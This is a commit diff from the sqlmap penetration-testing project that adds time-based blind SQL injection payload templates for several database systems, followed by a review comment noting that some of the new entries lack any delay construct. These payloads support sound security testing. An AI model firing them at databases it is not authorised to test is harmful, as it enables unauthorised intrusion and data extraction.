Commit 2656b8f

Merge branch 'master' of github.com:sqlmapproject/sqlmap
2 parents 655dd55 + 245bba5 commit 2656b8f

4 files changed

Lines changed: 321 additions & 12 deletions


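--- a/_sqlmap.py
+++ b/_sqlmap.py
@@ -14,13 +14,6 @@
 warnings.filterwarnings(action="ignore", message=".*was already imported", category=UserWarning)
 warnings.filterwarnings(action="ignore", category=DeprecationWarning)
 
-try:
-import psyco
-psyco.full()
-psyco.profile()
-except ImportError:
-pass
-
 from lib.controller.controller import start
 from lib.core.common import banner
 from lib.core.common import dataToStdout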

doc/FAQ.pdf

-716 Bytes
Binary file not shown.

doc/README.pdf

222 Bytes
Binary file not shown.

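--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -76,7 +76,7 @@ Tag: <test>
 2: Error-based SQL injection
 3: UNION query SQL injection
 4: Stacked queries SQL injection
-5: AND/OR time-based blind SQL injection
+5: Time-based blind SQL injection
 
 Sub-tag: <level>
 From which level check for this test.
@@ -2836,20 +2836,217 @@ Formats:
 <!-- End of OR time-based blind tests -->
 
 
+<!-- Time-based blind tests - Parameter replace -->
+<test>
+<title>MySQL time-based blind - Parameter replace (MAKE_SET)</title>
+<stype>5</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+<request>
+<payload>MAKE_SET([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>MySQL</dbms>
+</details>
+</test>
+
+<test>
+<title>MySQL time-based blind - Parameter replace (ELT)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>1</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
+<request>
+<payload>ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME]))</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>MySQL</dbms>
+</details>
+</test>
+
+<test>
+<title>MySQL time-based blind - Parameter replace (bool*int)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>1</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>([INFERENCE])*SLEEP([SLEEPTIME])</vector>
+<request>
+<payload>([RANDNUM]=[RANDNUM])*SLEEP([SLEEPTIME])</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>MySQL</dbms>
+</details>
+</test>
+
+<test>
+<title>MySQL &gt;= 5.0 time-based blind - Parameter replace</title>
+<stype>5</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
+<request>
+<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>MySQL</dbms>
+<dbms_version>&gt;= 5.0</dbms_version>
+</details>
+</test>
+
+<test>
+<title>MySQL &lt; 5.0 time-based blind - Parameter replace (heavy queries)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>2</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
+<request>
+<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>MySQL</dbms>
+</details>
+</test>
+
+<!-- TODO: carry on editing these payloads -->
+<test>
+<title>PostgreSQL time-based blind - Parameter replace (GENERATE_SERIES)</title>
+<stype>5</stype>
+<level>3</level>
+<risk>2</risk>
+<clause>1,2,3</clause>
+<where>3</where>
+<vector>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)</vector>
+<request>
+<payload>(SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>PostgreSQL</dbms>
+</details>
+</test>
+
+<test>
+<title>Microsoft SQL Server/Sybase time-based blind - Parameter replace</title>
+<stype>5</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>1,3</clause>
+<where>3</where>
+<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+<request>
+<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>Microsoft SQL Server</dbms>
+<dbms>Sybase</dbms>
+<os>Windows</os>
+</details>
+</test>
+
+<test>
+<title>Oracle time-based blind - Parameter replace</title>
+<stype>5</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>1,3</clause>
+<where>3</where>
+<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+<request>
+<payload>(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>Oracle</dbms>
+</details>
+</test>
+
+<test>
+<title>Microsoft Access time-based blind - Parameter replace</title>
+<stype>5</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>1,3</clause>
+<where>3</where>
+<vector>IIF([INFERENCE],[ORIGVALUE],1/0)</vector>
+<request>
+<payload>IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>Microsoft Access</dbms>
+</details>
+</test>
+
+<test>
+<title>SAP MaxDB time-based blind - Parameter replace</title>
+<stype>5</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>1,3</clause>
+<where>3</where>
+<vector>(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)</vector>
+<request>
+<payload>(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>SAP MaxDB</dbms>
+</details>
+</test>
+<!-- End of time-based blind tests - Parameter replace -->
+
+
 <!-- Time-based blind tests - GROUP BY and ORDER BY clauses -->
 <test>
 <title>MySQL &gt;= 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
 <stype>5</stype>
 <level>3</level>
-<risk>2</risk>
+<risk>1</risk>
 <clause>2,3</clause>
 <where>1</where>
 <vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
 <request>
 <payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
 </request>
 <response>
-<time>[DELAYED]</time>
+<time>[SLEEPTIME]</time>
 </response>
 <details>
 <dbms>MySQL</dbms>
@@ -2858,7 +3055,7 @@ Formats:
 </test>
 
 <test>
-<title>MySQL &lt; 5.0.12 boolean-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+<title>MySQL &lt; 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
 <stype>5</stype>
 <level>4</level>
 <risk>2</risk>
@@ -2875,7 +3072,126 @@ Formats:
 <dbms>MySQL</dbms>
 </details>
 </test>
-<!-- TODO: add tests for other DBMSes -->
+
+<test>
+<title>PostgreSQL &gt; 8.1 time-based blind - GROUP BY and ORDER BY clauses</title>
+<stype>5</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>
+<request>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>PostgreSQL</dbms>
+<dbms_version>&gt; 8.1</dbms_version>
+</details>
+</test>
+
+<test>
+<title>PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>2</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>
+<request>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>PostgreSQL</dbms>
+</details>
+</test>
+
+<test>
+<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title>
+<stype>5</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+<request>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>Microsoft SQL Server</dbms>
+<dbms>Sybase</dbms>
+<os>Windows</os>
+</details>
+</test>
+
+<test>
+<title>Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>2</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
+<request>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>Microsoft SQL Server</dbms>
+<dbms>Sybase</dbms>
+<os>Windows</os>
+</details>
+</test>
+
+<test>
+<title>Oracle time-based blind - GROUP BY and ORDER BY clauses</title>
+<stype>5</stype>
+<level>3</level>
+<risk>1</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+<request>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+</request>
+<response>
+<time>[SLEEPTIME]</time>
+</response>
+<details>
+<dbms>Oracle</dbms>
+</details>
+</test>
+
+<test>
+<title>Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
+<stype>5</stype>
+<level>4</level>
+<risk>2</risk>
+<clause>2,3</clause>
+<where>1</where>
+<vector>,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
+<request>
+<payload>,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
+</request>
+<response>
+<time>[DELAYED]</time>
+</response>
+<details>
+<dbms>Oracle</dbms>
+</details>
+</test>
+<!-- TODO: if possible, add payload for Microsoft Access -->
 <!-- End of time-based blind tests - GROUP BY and ORDER BY clause -->
 
 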
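Review bot: The new Parameter-replace entries at lines 2937–3032 (PostgreSQL GENERATE_SERIES, Microsoft SQL Server/Sybase, Oracle, Microsoft Access, SAP MaxDB) declare `<stype>5</stype>` with `<response><time>[SLEEPTIME]</time></response>`, yet none of their vectors contains a delaying construct — the true branch returns `[ORIGVALUE]` and the false branch yields `NULL` or a division by zero — so the promised delay can never be measured and each entry costs requests at level 3 without ever matching. The `<!-- TODO: carry on editing these payloads -->` at 2936 already marks them as unfinished; they should be left out of this merge until a delay primitive is in place (the ORDER BY entries in the last hunk already use one for the same DBMSes), or be re-homed among the boolean-/error-based tests whose response check they actually fit. By contrast the `[DELAYED]` vs `[SLEEPTIME]` split in the new entries is consistent: the BENCHMARK/GENERATE_SERIES/cross-join heavy queries use `<time>[DELAYED]</time>` and the SLEEP/PG_SLEEP/WAITFOR/DBMS_PIPE ones use `[SLEEPTIME]`, matching the correction at 3049. One smaller asymmetry: the `MySQL &lt; 5.0` heavy-query entry at 2917 carries no `<dbms_version>` while its `&gt;= 5.0` sibling at 2913 does; adding `<dbms_version>&lt; 5.0</dbms_version>` to its `<details>` would keep the pair symmetric, assuming the loader accepts that form as it does `&gt;= 5.0`.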
